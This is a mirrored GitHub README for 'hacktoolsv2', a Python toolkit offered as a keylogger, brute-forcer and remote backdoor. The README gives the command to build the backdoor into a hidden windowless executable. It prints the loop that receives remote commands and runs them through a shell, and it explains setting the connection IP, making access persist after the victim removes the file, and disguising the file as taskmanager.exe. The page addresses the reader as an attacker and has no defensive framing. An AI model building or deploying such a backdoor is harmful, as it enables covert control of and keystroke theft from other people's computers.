GithubHelp home page GithubHelp logo

wosberbondesu / hacktoolsv2 Goto Github PK

View Code? Open in Web Editor NEW
16.0 2.0 4.0 109 KB

:star: Python Keylogger PortScanner BruteForce and basic hack tools.(new ones will come soon)

License: GNU General Public License v3.0

Python 100.00%
hacking hacktools python keylogger

hacktoolsv2's Introduction

HackToolsV2

Python Keylogger PortScanner BruteForce and basic hack tools. Ekran Alıntıs2ı Ekran Alıntısı

forthebadge made-with-python

To make exe file write this code block to terminal

pyinstaller backdoor.py --onefile --noconsole

Additional codes:

#command = reliable_recv() #message = 'Hello world' #s.send(message.encode())

#s.recv(1024) #execute = subprocess.Popen(command, shell = True, stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)

#result = execute.stdout.read() + execute.stderr.read() #reliable_send(result)

command = reliable_recv()
message = 'Hello world'
s.send(message.encode())

s.recv(1024)
execute = subprocess.Popen(command, shell = True, stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)

result = execute.stdout.read() + execute.stderr.read()
reliable_send(result)

Ekran Alıntısı

due to some complications in server.py and backdoor.py You must replace the code blocks that write 127.0.0.1 with the local IP address.

LIKE THIS

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sck.bind(('127.0.0.1',5555))

s.connect(('127.0.0.1',5555))

TO THIS

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sck.bind(('192.1.2.12',5555))

s.connect(('192.1.2.12',5555))

about deactivated lines of code

some processes develop differently in your Linux and Windows operating systems.

programs have been deactivated because some processes cannot run at the same time even if they are written in both.

You can customize the lines of code you can also activate the startup codes I use to see if it works.

Even if the victim sees the file, closes it or removes it completely, write this code to your terminal after connecting to protect your connection

persistence Hacked taskmanager.exe

you can change the name Hacked immediately noticeable taskmanager.exe is fine the backdoor must be run on the victim's computer, and the server file is on your terminal. keylogger server and backdoor are connected, the rest are just plugins you don't have to use

hacktoolsv2's People

Contributors

wosberbondesu avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.